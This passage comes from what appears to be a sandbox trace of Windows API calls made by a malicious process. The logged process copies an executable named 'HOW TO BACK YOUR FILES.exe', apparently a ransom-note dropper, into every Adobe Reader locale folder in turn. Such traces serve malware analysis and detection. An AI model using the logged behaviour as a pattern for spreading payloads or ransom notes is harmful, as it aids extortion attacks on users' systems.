lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54e7c5e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54e7c5e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.390] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.390] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.390] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services" [0059.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0059.390] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services") returned 69 [0059.390] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services" [0059.390] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.390] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.396] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.396] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54e7c5e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54e7c5e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.397] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.397] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.397] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO" [0059.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0958 | out: hHeap=0x2b0000) returned 1 [0059.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0059.397] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO") returned 60 [0059.397] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO" [0059.397] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.397] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.404] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.404] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ea2740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ea2740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.404] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.404] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.404] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services" [0059.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0059.404] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services") returned 69 [0059.404] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services" [0059.404] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.404] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.411] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.411] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ea2740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ea2740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.411] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.411] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.411] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR" [0059.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08d0 | out: hHeap=0x2b0000) returned 1 [0059.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0059.411] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR") returned 60 [0059.411] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR" [0059.411] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.411] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.418] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.418] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ea2740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ea2740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.418] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.418] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.419] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services" [0059.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0059.419] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services") returned 69 [0059.419] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services" [0059.419] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.419] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.425] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.425] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ec88a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ec88a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.425] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.425] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.426] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL" [0059.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0848 | out: hHeap=0x2b0000) returned 1 [0059.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0059.426] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL") returned 60 [0059.426] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL" [0059.426] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.426] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.432] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.432] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ec88a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ec88a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.432] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.432] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.433] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services" [0059.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0059.433] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services") returned 69 [0059.433] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services" [0059.433] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.433] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.448] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.448] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54eeea00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54eeea00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.448] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.448] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.448] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL" [0059.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f07c0 | out: hHeap=0x2b0000) returned 1 [0059.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0059.448] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL") returned 60 [0059.448] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL" [0059.448] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.448] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.455] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.455] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54f14b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54f14b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.455] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.455] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.456] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services" [0059.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0059.456] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services") returned 69 [0059.456] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services" [0059.456] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.456] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.462] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.462] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54f14b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54f14b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.462] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.462] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.462] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO" [0059.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0738 | out: hHeap=0x2b0000) returned 1 [0059.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0059.463] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO") returned 60 [0059.463] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO" [0059.463] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.463] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.469] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.469] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54f3acc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54f3acc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.469] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.469] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.470] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services" [0059.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0059.470] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services") returned 69 [0059.470] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 